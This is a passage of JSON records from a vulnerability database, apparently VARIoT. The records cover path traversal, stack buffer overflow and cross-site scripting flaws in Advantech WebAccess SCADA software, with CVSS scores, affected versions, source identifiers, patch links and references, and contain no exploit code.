[IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 6.8, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.0, "id": "VHN-125992", "impactScore": 6.9, "integrityImpact": "NONE", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2018-15706", "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-15706", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2018-15706", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2018-22715", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201810-1563", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-125992", "trust": 0.1, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2018-15706", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULHUB", "id": "VHN-125992" }, { "db": "VULMON", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "WADashboard API in Advantech WebAccess 8.3.1 and 8.3.2 allows remote authenticated attackers to read any file on the filesystem due to a directory traversal vulnerability in the readFile API. Advantech WebAccess Contains a path traversal vulnerability.Information may be obtained. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. The WADashboard API is one of the dashboard API components. A path traversal vulnerability exists in the \\342\\200\\230readFile\\342\\200\\231 method of the WADashboard API in Advantech WebAccess versions 8.3.1 and 8.3.2", "sources": [ { "db": "NVD", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-125992" }, { "db": "VULMON", "id": "CVE-2018-15706" } ], "trust": 2.52 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-15706", "trust": 3.4 }, { "db": "TENABLE", "id": "TRA-2018-35", "trust": 3.2 }, { "db": "CNNVD", "id": "CNNVD-201810-1563", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-22715", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-011788", "trust": 0.8 }, { "db": "IVD", "id": "E300EBB0-39AB-11E9-9FEB-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-125992", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-15706", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULHUB", "id": "VHN-125992" }, { "db": "VULMON", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "id": "VAR-201810-0130", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULHUB", "id": "VHN-125992" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" } ] }, "last_update_date": "2024-11-23T21:52:47.754000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess/webaccessscada" }, { "title": "Advantech WebAccess WADashboard API \u0027readFile\u0027 method path traversal vulnerability patch", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/143933" }, { "title": "Exp101tsArchiv30thers", "trust": 0.1, "url": "https://github.com/nu11secur1ty/Exp101tsArchiv30thers " }, { "title": "", "trust": 0.1, "url": "https://github.com/lnick2023/nicenice " }, { "title": "awesome-cve-poc_qazbnm456", "trust": 0.1, "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 " } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULMON", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-22", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-125992" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.2, "url": "https://www.tenable.com/security/research/tra-2018-35" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-15706" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-15706" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/22.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://github.com/nu11secur1ty/exp101tsarchiv30thers" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULHUB", "id": "VHN-125992" }, { "db": "VULMON", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" }, { "db": "VULHUB", "id": "VHN-125992" }, { "db": "VULMON", "id": "CVE-2018-15706" }, { "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "db": "NVD", "id": "CVE-2018-15706" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "date": "2018-11-07T00:00:00", "db": "CNVD", "id": "CNVD-2018-22715" }, { "date": "2018-10-31T00:00:00", "db": "VULHUB", "id": "VHN-125992" }, { "date": "2018-10-31T00:00:00", "db": "VULMON", "id": "CVE-2018-15706" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "date": "2018-11-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "date": "2018-10-31T22:29:00.460000", "db": "NVD", "id": "CVE-2018-15706" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2018-11-08T00:00:00", "db": "CNVD", "id": "CNVD-2018-22715" }, { "date": "2019-01-30T00:00:00", "db": "VULHUB", "id": "VHN-125992" }, { "date": "2019-01-30T00:00:00", "db": "VULMON", "id": "CVE-2018-15706" }, { "date": "2019-01-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-011788" }, { "date": "2019-04-01T00:00:00", "db": "CNNVD", "id": "CNNVD-201810-1563" }, { "date": "2024-11-21T03:51:18.797000", "db": "NVD", "id": "CVE-2018-15706" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201810-1563" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess WADashboard API \u0027readFile\u0027 Method Path Traversal Vulnerability", "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-22715" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Path traversal", "sources": [ { "db": "IVD", "id": "e300ebb0-39ab-11e9-9feb-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201810-1563" } ], "trust": 0.8 } }
var-201711-0409
Vulnerability from variot
A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within implementation of the 0x138bd IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts will result in a denial-of-service condition. Versions prior to Advantech WebAccess 8.2_20170817 are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.8, "vendor": "advantech", "version": "8.2_20170817" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "_id": null, "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" }, { "db": "NVD", "id": "CVE-2017-14016" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-009932" } ] }, "credits": { "_id": null, "data": "Steven Seeley (mr_me) of Offensive Security", "sources": [ { "db": "ZDI", "id": "ZDI-17-938" } ], "trust": 0.7 }, "cve": "CVE-2017-14016", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "CVE-2017-14016", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 2.5, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-32562", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-104696", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitabilityScore": 2.8, "id": "CVE-2017-14016", "impactScore": 3.4, "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-14016", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2017-14016", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2017-14016", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2017-32562", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1259", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-104696", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "VULHUB", "id": "VHN-104696" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" }, { "db": "NVD", "id": "CVE-2017-14016" } ] }, "description": { "_id": null, "data": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within implementation of the 0x138bd IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts will result in a denial-of-service condition. \nVersions prior to Advantech WebAccess 8.2_20170817 are vulnerable", "sources": [ { "db": "NVD", "id": "CVE-2017-14016" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "BID", "id": "101685" }, { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "VULHUB", "id": "VHN-104696" } ], "trust": 3.33 }, "exploit_availability": { "_id": null, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-104696", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-104696" } ] }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2017-14016", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-17-306-02", "trust": 3.4 }, { "db": "BID", "id": "101685", "trust": 1.4 }, { "db": "EXPLOIT-DB", "id": "43340", "trust": 1.1 }, { "db": "CNNVD", "id": "CNNVD-201708-1259", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-32562", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-009932", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-4949", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-938", "trust": 0.7 }, { "db": "IVD", "id": "AE88E8AE-B267-4E99-BFAC-8A81BBB4590A", "trust": 0.2 }, { "db": "PACKETSTORM", "id": "145401", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-104696", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "VULHUB", "id": "VHN-104696" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" }, { "db": "NVD", "id": "CVE-2017-14016" } ] }, "id": "VAR-201711-0409", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "VULHUB", "id": "VHN-104696" } ], "trust": 1.582962455 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "CNVD", "id": "CNVD-2017-32562" } ] }, "last_update_date": "2024-11-23T22:45:33.607000Z", "patch": { "_id": null, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/105309" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=75601" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-119", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-104696" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "NVD", "id": "CVE-2017-14016" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-306-02" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/101685" }, { "trust": 1.1, "url": "https://www.exploit-db.com/exploits/43340/" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14016" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-14016" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-938" }, { "db": "CNVD", "id": "CNVD-2017-32562" }, { "db": "VULHUB", "id": "VHN-104696" }, { "db": "BID", "id": "101685" }, { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" }, { "db": "NVD", "id": "CVE-2017-14016" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a", "ident": null }, { "db": "ZDI", "id": "ZDI-17-938", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-32562", "ident": null }, { "db": "VULHUB", "id": "VHN-104696", "ident": null }, { "db": "BID", "id": "101685", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2017-009932", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201708-1259", "ident": null }, { "db": "NVD", "id": "CVE-2017-14016", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-11-03T00:00:00", "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a", "ident": null }, { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-938", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-32562", "ident": null }, { "date": "2017-11-06T00:00:00", "db": "VULHUB", "id": "VHN-104696", "ident": null }, { "date": "2017-11-02T00:00:00", "db": "BID", "id": "101685", "ident": null }, { "date": "2017-11-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-009932", "ident": null }, { "date": "2017-11-02T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1259", "ident": null }, { "date": "2017-11-06T22:29:00.240000", "db": "NVD", "id": "CVE-2017-14016", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-12-06T00:00:00", "db": "ZDI", "id": "ZDI-17-938", "ident": null }, { "date": "2017-11-03T00:00:00", "db": "CNVD", "id": "CNVD-2017-32562", "ident": null }, { "date": "2017-12-20T00:00:00", "db": "VULHUB", "id": "VHN-104696", "ident": null }, { "date": "2017-12-19T22:36:00", "db": "BID", "id": "101685", "ident": null }, { "date": "2017-11-29T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-009932", "ident": null }, { "date": "2017-11-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1259", "ident": null }, { "date": "2024-11-21T03:11:58.130000", "db": "NVD", "id": "CVE-2017-14016", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1259" } ], "trust": 0.6 }, "title": { "_id": null, "data": "Advantech WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-009932" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" } ], "trust": 1.4 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "ae88e8ae-b267-4e99-bfac-8a81bbb4590a" }, { "db": "CNNVD", "id": "CNNVD-201708-1259" } ], "trust": 0.8 } }
var-202106-1381
Vulnerability from variot
Advantech WebAccess 8.4.2 and 8.4.4 allows XSS via the username column of the bwRoot.asp page of WADashboard. Advantech WebAccess Contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Advantech WebAccess is a set of browser-based HMI/SCADA software developed by China Taiwan Advantech Company. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202106-1381", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "8.4.2" }, { "model": "webaccess", "scope": "eq", "trust": 1.0, "vendor": "advantech", "version": "8.4.4" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": "8.4.4" }, { "model": "webaccess", "scope": "eq", "trust": 0.8, "vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e", "version": "8.4.2" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2021-008065" }, { "db": "NVD", "id": "CVE-2021-34540" } ] }, "cve": "CVE-2021-34540", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2021-34540", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": 